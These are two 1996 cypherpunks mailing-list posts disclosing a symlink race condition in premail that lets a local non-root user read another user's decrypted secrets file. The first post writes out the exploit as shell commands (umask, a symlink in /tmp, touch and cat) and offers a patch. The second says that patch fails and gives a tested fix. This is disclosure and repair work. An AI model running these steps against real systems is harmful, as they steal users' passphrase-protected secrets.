From xs4all!toad.com!basement.replay.com!toad.com!dhp.com!toad.com!dhp.com!not-for-mail Mon Dec 23 13:36:10 1996 Path: xs4all!toad.com!basement.replay.com!toad.com!dhp.com!toad.com!dhp.com!not-for-mail From: Mixmaster Newsgroups: list.cypherpunks Subject: Security hole in premail Date: 21 Dec 1996 05:20:39 +0100 Organization: XS4ALL, networking for the masses Lines: 54 Sender: daemon@basement.replay.com Message-ID: <199612210235.VAA03805@dhp.com> NNTP-Posting-Host: basement.replay.com Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-XS4ALL-Date: Sat, 21 Dec 1996 05:20:44 MET X-Comment1: This message did not originate from the X-Comment2: above address. It was automatically remailed X-Comment3: by an anonymous mail service. Please report X-Comment4: problems or inappropriate use to X-Comment5: Precedence: bulk There's a pretty nasty bug in premail that allows any non-root to obtain the contents of the premail secrets file. This is a race condition that can be exploited because an indefinite amount of time can pass between the time that premail checks if the secrets file exists and when it tries to write to the file. It can be exploited as follows: attacker: $ umask 111 $ ln -s ~/premail-secrets-file /tmp/.premail-secrets.$< normal user: $ premail -login Remember to logout when done. Your premail passphrase, please: All the attacker has to do is execute "touch premail-secrets-file" between the time that the user is prompted for the passphrase and the time when the login is completed. $ ls -al premail-secrets-file -rw-rw-rw- 1 d00d nogroup 19 Dec 20 19:01 premail-secrets-file $ cat premail-secrets-file [contents of premail secrets file] This bug can be fixed in two ways. One way is to set the premail-secrets setting to some non-world-writable directory. The second way is to apply the following patch: *** premail.orig Fri Dec 20 18:46:01 1996 --- premail Fri Dec 20 18:55:54 1996 *************** *** 3574,3579 **** --- 3574,3582 ---- } for ($triesleft = 2; !$done && $triesleft; $triesleft--) { $pass = &getpass ($x); + if(!-O $ps) { + &error ("Secrets file exists and is owned by another user\n"); + } $status = &decrypt_secrets ($ps_pgp, $ps, $pass); if (!-s $ps) { unlink $ps; } $done = (!$status && -e $ps); From xs4all!toad.com!basement.replay.com!toad.com!dhp.com!toad.com!dhp.com!not-for-mail Mon Dec 23 13:36:36 1996 Path: xs4all!toad.com!basement.replay.com!toad.com!dhp.com!toad.com!dhp.com!not-for-mail From: Mixmaster Newsgroups: list.cypherpunks Subject: Re: Security hole in premail Date: 22 Dec 1996 07:45:30 +0100 Organization: XS4ALL, networking for the masses Lines: 39 Sender: daemon@basement.replay.com Message-ID: <199612220408.XAA03397@dhp.com> NNTP-Posting-Host: basement.replay.com Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-XS4ALL-Date: Sun, 22 Dec 1996 07:45:36 MET X-Comment1: This message did not originate from the X-Comment2: above address. It was automatically remailed X-Comment3: by an anonymous mail service. Please report X-Comment4: problems or inappropriate use to X-Comment5: Precedence: bulk On Fri, 20 Dec 1996, Mixmaster wrote: > *** premail.orig Fri Dec 20 18:46:01 1996 > --- premail Fri Dec 20 18:55:54 1996 > *************** > *** 3574,3579 **** > --- 3574,3582 ---- > } > for ($triesleft = 2; !$done && $triesleft; $triesleft--) { > $pass = &getpass ($x); > + if(!-O $ps) { > + &error ("Secrets file exists and is owned by another user\n"); > + } > $status = &decrypt_secrets ($ps_pgp, $ps, $pass); > if (!-s $ps) { unlink $ps; } > $done = (!$status && -e $ps); That patch doesn't work. It will always return an error. I have tested the following patch and it does work as intended: *** premail.orig Wed Oct 30 22:25:10 1996 --- premail Sat Dec 21 15:45:41 1996 *************** *** 3631,3636 **** --- 3631,3639 ---- $invoc .= ' > '.$ps; $invoc .= ' 2> '.$errfile; &pdv ("Invoking PGP as $invoc\n"); + if(-e $ps) { + &error ("Premail secrets file already exists\n"); + } $status = &open_pgp ($invoc, $pass, ''); $err = &read_and_delete ($errfile); &pdv ($err); Sorry about the previous mistake.